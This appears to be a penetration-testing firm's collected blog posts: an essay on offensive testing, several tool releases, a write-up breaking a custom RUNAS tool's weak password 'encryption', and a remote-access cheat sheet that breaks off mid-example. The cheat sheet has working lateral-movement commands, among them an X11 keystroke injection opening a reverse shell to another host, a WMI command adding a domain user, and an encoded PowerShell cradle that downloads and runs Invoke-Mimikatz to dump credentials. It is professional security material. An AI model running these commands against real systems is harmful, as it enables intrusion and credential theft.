Advancing Strategic Security Goals with Offensive Testing

Your organization has a unique information security posture and nobody really understands it like you do. You are fighting a constant battle, not only against those who would attack your organization but for the resources required to perform your duties. You face competition for qualified personnel, push-back on costly best practices, and arguments against upgrading or purchasing critical new technology. Even when it seems like everything is ticking like clockwork, you know the storm is just over the horizon. The constant pressure of all these challenges can easily push the idea of offensive (penetration) testing way down the priority list. Additionally, penetration testing is often negatively framed as an unnecessary, disruptive exercise that generates additional busy-work for the already overtaxed security team.

In reality, offensive testing is a powerful tool for prioritizing and advancing your security program.

Advocating for the resources you need can be difficult, but a well-designed and executed penetration test can provide you with both the narrative and metrics to reinforce your arguments. A penetration test can answer difficult questions, uncover critical issues, and break-up analysis paralysis. The key lies in understanding what goals you are looking to achieve and working with your penetration testers to design an engagement that advances that agenda.

Often penetration testers will talk about the specific goals or “flags” for a particular engagement. An example would be “accessing credit card data” as part of a Payment Card Industry (PCI) compliance testing requirement. While it’s important to define these tactical goals that will be pursued during the test, it’s critical that everyone understand the larger, strategic goals you hope to achieve. Starting with a strong understanding of what goals you want to achieve will provide the foundation for the entire test. Effective communication of these goals helps select the right penetration testing team, ensures the test is properly scoped, and that the resulting report provides the greatest value for your budget. The exact motivations will be unique to your organization, but we detail seven of the most common starting points below.

Budget Balance

That brand new, next-gen AI powered Anti-APT wonder appliance (with customizable dashboards) might provide visibility into the dark corners of your network. However, you also need additional headcount to round out your team’s IR skillset. Or maybe you don’t really need either of those things. Offensive testing can demonstrably highlight the immediate need for your most requested resources. Setting a testing goal to determine gaps caused by a lack of resources provide insight into where your security budget would best be allocated and ammunition for why it should be increased. You could discover that instead of a new appliance, you simply need to deploy proper coverage of other technologies. Or maybe that appliance is exactly what you need to move your security program forward.

Alternative Analysis

Building secure systems is difficult. Getting Senior Developers, System Administrators, Network Engineers, and various other stakeholders to understand and properly implement security when designing a new system is an uphill battle. Their efforts are further hampered by the fact that they simply do not think like an attacker. Where a design team may see a series of reasonable and rational decisions, and assumptions an attacker may see a security hole through which they could drive a truck. Setting a goal of providing an alternative viewpoint, the viewpoint of an outside attacker, allows testing to discover gaps in the design, and provide recommendations before it’s too late.

Details Matter

Implementation errors are perhaps the single largest source of vulnerabilities in all of information security. A solid design is a great foundation but your systems are ultimately implemented by people and people can be relied upon to make bad security decisions. The gaps between the secure design and the imperfect implementation can be difficult for automated scanning tools to discover but can be easily leveraged by an attacker. Setting a testing goal of discovering these types of implementation errors results in more robust and hardened systems.

Baselines

“We have never had a test.” Maybe your organization is just reaching the size and complexity where a penetration test could provide real insight. Or maybe you have just come on-board to manage your organization’s information security program and are looking to better understand the landscape. Do you really know your current security posture, Internet-facing attack surface, susceptibility to phishing and Application/Database security?  Setting a testing goal of assessing overall security health can provide a more accurate picture of your current environment and prioritize the biggest risks to your data.

Mergers & Accusations

Growth is an important aspect of business but acquiring a new company often involves dealing with an unknown level of risks. The merger may bring in a new technology stack which seems to be exactly what your company needs to increase its competitive advantage. However, integrating systems blindly may introduce a whole host of vulnerabilities into your organization, undoing years of hard work. Standardizing security assessments as part of the M&A process can help identify vulnerabilities that carry their own remediation costs. A third-party testing firm can provide the impartial assessment needed to move forward with confidence.

Vendor Security

Partnering with various vendors is critical to the success of your organization. Every vendor is ready to assure you that they take security “seriously” or even “very seriously”. Trust but verify, a testing goal targeting vendor systems integrated with your organization is a solid starting point. Additionally, vendors should be able to produce sanitized versions of their own penetration testing reports as evidence of their “serious” commitment to security.

Blue Team Training

A key part of your blue team’s responsibility is to detect and respond to threats. Keeping these capabilities sharp requires both training and experience. Well-scoped Red Team and Purple Team engagements can provide valuable learning experiences for your blue team. Constructing a testing goal of providing a realistic attack scenario in a controlled fashion can identify gaps in your overall technology, training, processes, and design.

Working in information security requires finding the compromise between the ideal security and the reality of our chaotic world. Well planned and executed offensive testing can provide the arrows in your quiver needed to advance your information security program.

Knowing What To Expect - os-file-list

It’s something every web application penetration tester comes across. You uncover a possible weakness, maybe a local file inclusion, directory traversal, or other vulnerability that could allow for interaction with the file system. What you need to verify the finding is a known file in a known location and, most of the time, testers tend to choose the old stand-by “/etc/passwd”.

But what happens when the web application firewall designer is wise to your penetration tester tricks and blocks on a trigger of “/etc/passwd”? What happens when the verification of this vulnerability is not the end of the finding but the start of your larger attack? Flexibility and a depth of options becomes more important and a larger list of potential local files can be very helpful.

os-file-list (https://github.com/DolosGroup/os-file-list)  is a simple project designed to help penetration testers easily move past “/etc/passwd”, providing a base to cover various configurations and identify gaps in protections. os-file-list is a directory listing of world-readable files from the different Linux distributions available on leading cloud service providers. In addition to the world-readable files, we also provide readable file listings for a basic user with no special permissions as well as the default user created by the cloud service provider (e.g. admin/ec2-user/root). We found the basic user useful for when administrators create a limited user account (a best practice) for handling various tasks and the default user useful when an administrator failed to create a separate user.

The output is a simple one file per line format, easily included in directory enumeration tools such as Burp Intruder, or any custom written script. Additionally, the script used to generate the directory files is included in the project should anyone need to easily generate a custom listing.

Project URL: https://github.com/DolosGroup/os-file-list

Pillaging The Jenkins Treasure Chest

Jenkins is a popular target for penetration testers mainly because certain server configurations expose the Groovy Script Editor which, provided the proper payload, can lead to remote code execution on the server. More and more commonly though, this technique is working less and less.

Despite this, even if you don’t have access to the Groovy Script Editor, you still stand a decent chance of getting something valuable out of it. Jenkins tends to be a treasure trove of information in certain organizations, and it’s all too easy for a developer or operations team to leave something behind “just to get things done”.

A little background – Jenkins is an automation server for developers to automate the building of software, run tests on that software, etc. These “builds” that Jenkins runs, can contain things like the console output of the build process, (basically stdout of a bunch of commands and scripts), associated files in the form of “workspaces”, inherited environment variables, and much more. 

Let’s talk about a couple of these:

Console Output

During a pentest, we found a Jenkins server with hundreds of “builds”, each containing a handy button on the left side called “Console Output”.

Screen Shot 2019-06-20 at 2.37.34 PM.png

Intrigued, we clicked on it and saw what ended up being the literal stdout of the build process. Many of the builds’ console output we checked ended up being mostly useless, but some? Not so useless. A couple examples of what we’ve seen:

  • Curl/wget commands with plaintext creds to different services

  • Contents of certain automation scripts

  • Failed test cases containing SOAP requests & developer credentials

  • SSH private keys as part of a deployment script

  • Mysql client, JDBC connection strings, and sqlplus credentials

Interestingly, we saw that several instances of the exposed data were actually because some part of the build process failed, and data was exposed as error messages or stack traces. If the build succeeded properly, nobody may have known. This goes to show that failure conditions can be just as important, if not more than success conditions.

We found that the “Console Output” was in every build we came across and was a very reliable source of sensitive information.

Workspaces

Certain project builds are more complicated and require accompanying files to correctly build the project. They could be source code, private keys, certificate bundles, credentials, configs, or anything else. You can think of workspaces the same way you think of directory indexing on web servers.

Screen Shot 2019-06-20 at 3.11.59 PM.png

Workspaces did not appear in as many builds as the console output did, but tended to contain even more sensitive information. A couple of things we found from workspaces:

  • “Protected” source code

  • Many web.config files containing DB connection details

  • .ssh folders with private keys & known hosts files

  • Client certificates & credentials for connecting to APIs

  • Included, but unused scripts containing hardcoded credentials

  • AWS deployment ID & secret keys

We found that workspaces tended to have a lot of data they didn’t need. After all, it’s easier to include a whole directory structure, than specifically say which directories are important or not.

Environment Variables

It’s well-known within the developer community that including credentials in source code is a pretty big no-no. Despite this advice being often ignored, some developers follow the guidance of “include credentials and API keys as environment variables” which is better. Well, Jenkins can expose those too.

You can configure certain builds to inherit particular environment variables that the build can refer to during its creation process. Things we’ve seen from exposed environment variables:

  • Internal network information for where the build if being deployed

  • Credentials

  • Proxy settings

  • Paths, usernames, emails, and admin URLs

Tool Release

These techniques have been used to compromise multi-billion-dollar corporations and are incredibly useful in today’s application development landscape. If you come across a Jenkins server during a pentest, we highly recommend taking a look at the accessible internals. Unfortunately, grabbing all these pieces manually from the web interface can be tedious and a hassle. We are releasing Jenkins-Pillage to automatically gather this information more quickly and easily.

https://github.com/DolosGroup/Jenkins-Pillage

Pentest Deep-Dive: Custom RUNAS

Information Security often exists in a delicate balance with business demands. Organizations weighing security against functionality, cost, ease-of-use, or time for development, commonly choose imperfect but realistic compromises.

For the most part, these compromises allow for progress towards business objectives while maintaining an acceptable balance. Other times—especially in the absence of a proper security evaluation—organizations can inadvertently deploy solutions that drastically increase their risk.

During a recent internal network penetration test we came across a prime example of an unbalanced solution. To solve the old problem of "How do we allow our users to install approved applications on their systems?" this organization developed a custom solution in-house. Installation scripts for the approved applications were placed within a directory on the C:\ drive and, via an easy-to-use GUI, users could select which program to install, triggering the associated script.

As a security consideration within this environment, users were not administrators on their assigned systems. However, most of the approved applications require administrator privileges to install.

As a security inconsideration, all the user workstations have been configured with a shared local administrator password so a single version of the script could be deployed on every system.

At some point, we imagine the idea was floated to use the RUNAS command in a batch file to execute the installation as the local administrator. However, RUNAS expressly does not accept including a password on the command line as doing so would inevitably lead to weak deployments. As described by Microsoft’s Raymond Chen:

This was a conscious decision. If it were possible to pass the password on the command line, people would start embedding passwords into batch files and logon scripts, which is laughably insecure.
— https://blogs.msdn.microsoft.com/oldnewthing/20041129-00/?p=37183

Raymond kindly offers an option for those looking to head down this bad decision rabbit-hole in the form of creating a custom executable using the “CreateProcessWithLogonW function, which does allow for plaintext passwords from the command line. And as such, a custom executable which solved this corporate need was born. For the context of this writeup we will call this RUNAS_A.exe.

At first glance we can see the developer attempted to avoid using plaintext passwords as command line arguments by instead requiring an encrypted value. An example of this:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\installApp\install.bat”

But wait, couldn’t any user run any command as the local administrator by merely using the same command line string with a different command? e.g.:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\evilApp.exe”

You guessed it. A static value whether “encrypted” or not does not prevent abuse given the design of this application. Given this knowledge, an attacker could perform horizontal and vertical (per system) privilege escalation to all machines sharing the Local Administrator credential.


Lets dive a little deeper…

When first looking at the RUNAS_A command string, we noticed the password value was base64 encoded. For example:

     RUNAS_A /user admin /pass lkB6RJYwDDFtbxckaGeaUuQwWnXpcAsuHEmaMNAhrQ== “C:\installApp\install.bat”

Our hopes that someone had made the classic mistake of confusing encoding with encryption were soon dashed as the decoded password string had likely been encoded to avoid either unprintable or control characters.

Decoded Encrypted Password

Decoded Encrypted Password

The password was easily decoded but still encrypted. With access to the RUNAS_A executable, we took a look to see what it was doing regarding encryption. Before starting up any serious reversing effort, we tried running the application with no options provided.

Running RUNAS_A.exe

Running RUNAS_A.exe

One of the options of RUNAS_A is an "encryption mode" to let you encrypt passwords before use. Let's try a quick known-plaintext attack to see if we can figure out what is going on.

Encrypting a Password with RUNAS_A.exe

Encrypting a Password with RUNAS_A.exe

Decoding our base64 output gives us the encrypted password.

Decoded Encrypted “testpassword” Password

Decoded Encrypted “testpassword” Password

Time to take a look at the output and identify the encryption algorithm? After merely looking at it for a second, we realize the “encryption” involves placing a random character between every other character of the password.

“DECRYPTED”

“DECRYPTED”

Taking another look at our original encrypted password from the batch file we can see it will “decrypt” to: “@D01o$gROup.IO!” which, for the purposes of this writeup, is the shared local administrator password.

Decrypted Original Password

Decrypted Original Password

Another bittersweet moment in information security where, as the riddle is solved, the horrible truth is revealed. Not only is encrypting the password useless in attempting to restrict use of the credentials but the encryption itself is useless in preventing anyone from learning the plaintext of the password. We have seen CTF puzzles designed for children that have provided a greater cryptanalysis challenge than this application.

Diving a bit deeper into the RUNAS_A executable, using ILSpy as RUNAS_A.exe is .NET, we can see that the "encryption" function "EncodePID" involves pairing up random characters with the characters of the password and then base64 encoding the string.

Encryption Function

Encryption Function

The “decryption” function is similarly simple, pulling out every other byte from the “encrypted” password.

Decryption Function

Decryption Function

Ultimately what we have here is a poorly balanced solution and a study in avoidance. There was a need for deploying software, on demand, to end-users. To avoid making every user a local administrator; a single administrator account is reused for every system. To avoid the security restrictions of a commercially available tool; an insecure, in-house application was developed. To avoid the appearance of plaintext credentials within the installation scripts, pointlessly “encrypted” credentials were used. Finally, the golden rule of “Don’t Roll Your Own Crypto” was avoided in spectacular fashion.

Frustratingly to the InfoSec mind, this security train wreck of a solution has been functioning without issue since it was developed and deployed in 2006. The original perpetrators have long since left the organization and, as the application itself has not been a squeaky wheel, it has gotten no security grease.

Hidden issues like these are the sort of findings a penetration test can uncover. Vulnerability scanning will never identify issues like these within a custom application, there will never be a vendor patch or update, and it's too vital an application to just decommission for no reason. A quality penetration test can not only discover problems like this but help demonstrate what the exact impact could be, make the argument as to why things need to change and offer advice on bringing you program back into balance.

Restore a SQL Server Database to AWS

It happens to all testers eventually. You come across a file share hosting dozens of database backups. Giddiness ensues as you realize you have full read access and can copy any of them down to your dropbox, until you notice the database backups are tens, if not hundreds, of gigabytes in size. However, in this particular situation you simply have neither the hard drive space nor bandwidth to pull down a massive database backup and boot up a virtual machine to search through the data in a timely fashion.

Cue Amazon Web Services (AWS). We can upload the database to a secure, non-public S3 bucket and have Amazon Relational Database Service  (RDS) restore the database directly. This means that we can have access to that data in as little as 10 minutes while all the “heavy lifting” is performed by the cloud.

***NOTE: This script can help you demonstrate the impact of test findings without overtaxing your time or hardware but remember to always discuss the potential use of cloud technology during the engagement with your clients before testing begins.

Unfortunately, AWS likes to complicate things and there are quite a few steps involved in performing those two actions. At the bottom is a link to a bash script that will handle the entire exchange. The input is simply the database backup file to be uploaded, as well as the name of the database. After successful uploading and restoration you are provided with a table count and connection details for further queries.

Running without any arguments:

$ ./sql-backup-restore.sh
usage: ./sql-backup-restore.sh options
This script restores a SQL Server database backup to AWS and returns
connection details & a table count

OPTIONS:
   -h      Show this message
   -f      The SQL Server Database backup file (usually .bak)
   -d      Database Name (ex. MYDATBASE)

Running on a test database:

$ ./sql-backup-restore.sh -f /mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak -d THISISMYDATABASENAME
[*] Creating S3 Bucket to store database backup: s3-sql-restore-wi41zjcsdg
[*] Uploading backup file (/mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak) to S3 bucket (s3-sql-restore-wi41zjcsdg)
upload: ../JulyDatabaseBackup.bak to s3://s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak
[*] Creating a VPC security group allowing TCP1433 inbound for RDS
[*] Creating the IAM Role & Policy so RDS can access S3
[*] Creating an option group (option-group-sql-restore) to hold the SQLSERVER_BACKUP_RESTORE option for RDS
[*] Adding the SQLSERVER_BACKUP_RESTORE option to option-group-sql-restore group
Username: user34wkeceq
Password: pass9zoacs5
[*] Creating the RDS SQL Server Database - db-sql-restore-rwkmm7hog ~15mins
[*] RDS SQL Server now starting
RDS Still coming up...may take a few minutes
<SNIP>
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
[*] SQL Server hostname:
Hostname: db-sql-restore-rwkmm7hog.cicdy9uy2.us-east-1.rds.amazonaws.com
Username: user34wkeceq
Password: pass9zoacs5
[*] Restoring the SQL server database from S3
[*] still restoring the DB
<SNIP>
[*] still restoring the DB
          1 RESTORE_DB                                         THISISMYDATABASENAME                                                    [2019-01-18 1 2019-01-18 16:42:22.087 2019-01-18 16:41:15.730 arn:aws:s3:::s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak                                                                                                                                                                                                                                                                                                      0 NULL
[*] Row count for all tables in the database
Changed database context to 'THISISMYDATABASENAME'.
                         rows
------------------------ -----------
sysclones                          0
sysseobjvalues   
<SNIP>                          1220
sysschobjs                      2428

(94 rows affected)
[*] Run whatever SQL queries you want with:
sqlcmd -S db-sql-restore-rwkmm7hog.cicdy9uy2.us-east-1.rds.amazonaws.com -U user34wkeceq -P pass9zoacs5

Now, while the script relies on Mircosoft’s “sqlcmd” to run the stored procedures automatically, there is nothing stopping you from connecting with something like SQL Server Management Studio for autocomplete and other features.

The tool can be found here: https://github.com/DolosGroup/sql-backup-restore

Inside the wire at GSX 2018

This Tuesday at the ASIS Global Security Exchange (GSX) in Las Vegas, Mike Kelly and I presented our talk “Network Attacks Against Physical Access Controls” covering our experiences attacking organizations’ physical security controls post network compromise. This is a topic we had spoken about before at other conferences (HushCon, THOTCON) but the GSX was our first opportunity to move this conversation outside the strictly Information Security community, and speak directly with the type of people and organizations that would be on the receiving end of these types of attacks.

Mike and I work as penetration testers and Red Team members, assessing the security of computer networks, systems, facilities and personnel for numerous organizations. Most commonly, our clients are responsible for I.T. or Information Security at their organizations and requests for physical security testing would primarily focus on a basic scenario of: “Can an attacker leverage physical access to our facility to gain access to our internal network?” Findings for these physical security engagements would detail the methods an attacker, without network access, would use to physically compromise a location to gain a network foothold. This attack methodology provides value to the Information Security team, where protecting IT resources is the overall goal and where physical compromise is a means by which an attacker may attempt to bypass other defenses.

What we found missing from this methodology was a broader understanding and assessment of the physical security perimeter as a target itself. When we consider physical security controls as more than just a barrier protecting the network and instead think about their role protecting the physical security and safety of the entire organization we find that many of more common attack tactics and techniques fall short of assessing the complete physical security attack surface.

Understanding where your perimeter begins is a vital part of building a comprehensive security program. It’s easy to say that the physical security perimeter starts at the edge of the property, the main gate or the limit of the security camera’s field of view but these fail to consider the current level of connectivity found in the majority of organizations. Physical Access Control Systems (PACS) hardware and software has evolved from using dedicated equipment, cabling, and protocols to being near plug-and-play with the rest of the network. At the same, the explosion of internet-based attacks against organization’s networks and personnel has effectively expanded that physical security perimeter to include the entire world.

In our presentation we talked about how physical security testing is progressing; moving past some of the more traditional techniques such as lockpicking and tailgating or piggybacking and more recent methods like long-range RFID badge cloning. We provided with a number of examples of different techniques we had put into practice during engagements targeting physical access control systems after achieving a level of unauthorized network access.

The first method we covered involves attacking the PACS hardware/firmware directly. During a Red Team test, Open Source Intelligence (OSINT) gathering revealed the exact model of door controller installed at the target facility. After acquiring one of the devices, Mike discovered a weakness in the system’s communication protocol (CVE-2017-16241) and developed a working exploit. As a result, we were able to remotely unlock the doors of the targeted facility, including those protected by biometrics. Similar research into these type of systems is ongoing with the most recent example being Google’s David Tomaschik talk, “I'm the One Who Doesn't Knock” at DEF CON 26.

Next, we spoke about attacks against the PACS backend systems and supporting infrastructure. These fall in line with what we would see in network penetration test. Instances of improperly stored database backups containing badge numbers, PACS software with default credentials (including unchangeable passwords), unencrypted communications, and a lack of network segmentation result in the capture of sensitive badge credentials, and the ability to assume direct control of employee badging and surveillance camera systems.

Finally, we covered exploiting common user errors to gain physical access. These often follow a pattern of weak password selection combined with a failure to understand the sensitivity of the information like employee badge numbers. While most people would pause before emailing a spreadsheet full of unencrypted passwords, a list of employee badge numbers may not elicit the same caution. Compromising one employee email account can lead to an attacker having all of the information needed to create functional clones of employee badges for the entire organization.

One of our main motivations for presenting at GSX was the opportunity to speak with the people at the intersection of information and physical security. The separation of responsibilities between an organization’s information security team and the operations/physical security team can complicate communicating the level of risk revealed by this type of testing and opportunities to bridge that gap are key. The Q&A session and discussions we enjoyed with our audience and the other attendees at GSX provided us with valuable insight into the challenges facing all of us as we continue to work towards a more secure world.

For more information on this topic, please feel free to contact us at info@dolosgroup.io.

Remote Access Cheat Sheet

Since the advent of networked computers, administrators have had a legitimate need to remotely control systems. Several technologies have emerged to facilitate this including built-in solutions as well as third-party options. As the list grows, pentesters/attackers have a growing list of options at their disposal; however we haven't found a good resource that catalog's them for quick reference. 

In coordination with @atucom and @thejosko's talk "Not Your Daddy's Winexe" presented at Thotcon 0x9, we have assembled this cheat sheet for remotely accessing systems. Many/most of the following methods will require pre-existing knowledge of credentials, or access to a machine that will be leveraged for lateral movement. 

If you see any of the following ports open, the corresponding technologies might be configured to allow remote access:

table.png

Remote Desktop Protocol (RDP)

RDP is Microsoft's built-in remote desktop solution that ships with all versions of Windows. The service is not listening by default, but it is commonplace to enable it in corporate environments. 

Port: 3389/TCP

Tools: Microsoft Remote Desktop Client (Windows/Mac), rdesktop, xfreerdp

Examples:

  • C:\Windows\System32\mstsc.exe
    
  • rdesktop -g 80% 192.168.112.200
  • xfreerdp /u:josh /d:testlab /pth:64f12cddaa88057e06a81b54e73b949b /v:192.168.112.200

Virtual Network Computing (VNC)

VNC was created as a vendor agnostic graphical desktop solution and is widely deployed in *nix environments. Historically it was commonly deployed without authentication. Modern servers strongly urge administrators to configure a password. 

Port: 5900/TCP

Tools: The plethora of open-source VNC applications, RealVNC, TightVNC, Screen Sharing (Mac)

Examples:

  • vncviewer

Apple Remote Desktop (ARD)

ARD is Apple's graphical remote desktop solution. The service is not listening by default, and in our experience it is not widely deployed. 

Port: 3283/UDP (v1), 5900/TCP (v2)

Tools: Screen Sharing, VNC applications

Examples:

  • /System/Library/CoreServices/Screen Sharing.app
    
  • vncviewer

Xorg

The Xorg Foundation create and maintain's the widely deployed X11 windowing system used in most *nix environments. Most administrators are aware that the client-server model allows forwarding of X-sessions over SSH tunnels; however, when configured to allow TCP sessions, the X-session can be attached to remotely. The default X11 configuration was changed to disallow TCP sessions several years ago, but we still see it from time to time. If you see TCP 6000+N open, you can likely execute code on that machine or remotely log keystrokes.

Port: 6000+N/TCP, (or 22/TCP via SSH)

Tools: xspy, xwatchwin, xwd, xvkbd, ssh, MSF, xrdp.py

Example screenshot:

xwd -root -screen -silent -display 192.168.37.146:0 > screenshot.xwd


Example keyboard injection:

xvkbd -no-repeat -no-sync -no-jump-pointer -remote-display 192.168.37.146:0 -text "/bin/bash -i > /dev/tcp/192.168.37.101/8000<&1 2>&1\r"


Example remote keylog:

xspy 192.168.1.1

System Center Configuration Manager (SCCM) Remote Control

SCCM is often used in enterprise networks to handle patch deployment for workstations and servers, as well as help facilitate installation of applications to groups of managed systems. When configured through the administration console, managed systems can be configured to start a remote control service (System Center Remote Control). While it provides similar functionality to RDP, it does not leverage Terminal Services, and in certain configurations can allow full control of a remote system without alerting logged-on users to the session hijack. 

Port: 2701/TCP

Tools: CmRcViewer.exe, SCCM Admin console

Note: If you are not inclined to download a random executable from the Internet(duh), the SCCM Remote Control client can be found at C:\Program Files (x86)\Microsoft Configuration Manager\AdminConsole\bin\i386\ after installing SCCM. Be warned, setting up an SCCM lab is unfathomably complicated.


Telnet

Modern operating systems no longer leverage telnet, but we still see it on almost every pentest on embedded devices, or legacy systems. The old skool command line console access operates as a cleartext protocol and has largely been replaced by SSH. 

Port: 23/TCP

Tools: Telnet, Netcat (nc), Ncat

Examples:

  • telnet 192.168.1.1
  • nc 192.168.1.1 23
  • ncat 192.168.1.1 23

RLogin/Rsh

The Berkeley alternate to the Telnet standard was used on *nix systems for decades before being replaced by SSH. Rather than requiring user/password auth, administrators could specify source machines that were considered authenticated via a .rhosts file. Rlogin is an interactive shell, similar to telnet. Rsh can be used to execute a single command. 

Port: 512-514/TCP

Tools: rlogin, rsh, remsh, rexec, rcp

Examples:

  • rlogin -l josh 192.168.1.1
  • rsh -l josh 192.168.1.1 "ping -c4 192.168.1.2"

Secure Shell (SSH)

It's everywhere in the *nix world, and has a ton of features built in that us attackers can leverage for pivoting, tunneling X-sessions, file transfers, etc.. 

Port: 22/TCP

Tools: ssh, PuTTY

Examples:

  • ssh root@192.168.1.1

Server Message Block (SMB)

SMB has been leveraged for file administration on Windows and *nix systems for decades. Another feature often abused by attackers is the use of administrative shares (C$, ADMIN$, IPC$) to push a service binary to a target machine, then start the service for semi-interactive I/O. SysInternalsSuite includes the PsExec binary which is largely credited for developing and leveraging this technique. Local administrative privileges are required to push the service binary to the ADMIN$ share, after which an RPC/SVCCTL call creates and starts the remote control service. IPC$ is leveraged to create named pipes for input and output which act as a semi-interactive shell. 

Port: 445/TCP (SMB), 135/TCP (RPC), High-random port

Tools: PsExec,exe, psexec.py (impacket), winexe, MSF, smbexec

Examples:

  • PsExec.exe \\192.168.1.1 -u josh -p Password1 cmd.exe
    
  • winexe --system --uninstall -U testlab/josh%Password1 //192.168.112.200 cmd.exe
  • psexec.py 'josh':'Password1'@192.168.112.200 cmd.exe
  • smbexec.py 'josh':'Password1'@192.168.112.200 cmd.exe

Windows Remote Management (WinRM)

WinRM was Microsoft's implementation of the open WS-Management standard for SOAP-based remote management. Microsoft includes several standalone tools (winrm, winrs) and is also the underlying technology used for PowerShell Remoting. Under the surface, WinRM makes use of WMI queries, but can also leverages the IPMI driver for hardware management. It's a terribly powerful tool, albeit not a widely deployed yet due to its relative infancy. 

Port: 5985/TCP (HTTP), 5986/TCP (HTTPS)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

winrm get wmicimv2/Win32_Service –r:192.168.112.20


Example execute ipconfig (or any other code):

winrs /r:WIN-DEHIB5FROC2 /u:josh /p:Password1 ipconfig


Example PSRemote cmdlet on remote system:

PS> Invoke-Command 192.168.112.200 {Get-Service *}


Example PSRemote interactive PS Session:

PS> Enter-PSSession -ComputerName 192.168.112.200 -Credential testlab\josh
PS> ...
PS> Exit-PSSession

Windows Management Instrumentation (WMI)

WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution, or full code execution. Impacket includes wmiexec which also provides a semi-interactive shell. 

Remote WMI queries used RPC/DCOM as the communication bus.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"


Example execute code (add user):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"


Example list services (via PS cmdlet):

PS> Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"


Example list processes (via linux wmic util):

pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"


Example semi-interactive shell (impacket):

wmiexec.py 'josh':'Password1'@192.168.112.200

Scheduled Tasks 

Tasks, that are, scheduled. In addition to running commands locally, the built-in schtasks utility leverages RPC/DCOM to schedule tasks on remote machines. On legacy Windows machines At.exe performed this functionality, but was deprecated for SchTasks in modern platforms. Application firewalls that block Schtasks may still allow At, a good reason to attempt both if necessary. 

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: schtasks, at

Examples:

  • schtasks.exe /Create /S 192.168.112.200 /U testlab\josh /P Password1 /TR "C:\Windows\System32\win32calc.exe" /TN "pwnd" /SC ONCE /ST 20:05
  • at.exe \\192.168.112.200 20:25 cmd /c "C:\Windows\System32\win32calc.exe"

Microsoft Management Console (MMC2.0) Application Class

In 2017, Matt Nelson released research into methods for lateral movement using DCOM. We strongly urge you to review his research for full details (it's worth the read). Reviewing all the intricacies of DCOM is outside the scope of what can/should be covered in a "cheat sheet", but leave it to say the MMC2.0 application class can be accessed remotely over RPC/DCOM, and exports the ExecuteShellCommand method which can be used to... Execute..a..Shell..Command.

MMC requires local admin due to the nature of the application, and will be blocked by the default firewall rules. BUT, we've seen enough networks that disable host firewalls to make good use of this technique. 

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

Example code execution:

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.112.200"))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,"7")


Example Invoke-Mimikatz (listener started on 192.168.112.132:8000):

PS> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString('http://192.168.112.132:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:\\Users\\josh\\Desktop\\mimi.txt"))

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.112.200"))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQAyAC4AMQAzADIAOgA4ADAAMAAwAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAD4AIABDADoAXABcAFUAcwBlAHIAcwBcAFwAagBvAHMAaABcAFwARABlAHMAawB0AG8AcABcAFwAbQBpAG0AaQAuAHQAeAB0AA==","7")

ShellWindows Object

A few weeks after his initial research on MMC lateral movement, Matt Nelson published more research targeting DCOM objects that lacked an explicit LaunchPermission attribute. Read his post here for a thorough review of the techniques shown below.

Successful auth over RPC is required; however, regardless of privilege the code will execute as a child of the explore.exe process with limited privileges. No scaping memory directly with this method.. :(

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows


When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"


Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)


Example: call shutdown routine (user prompted for confirmation):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShutDownWindows()


Example troll: launch IE with Sloths in Space (10 hours):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
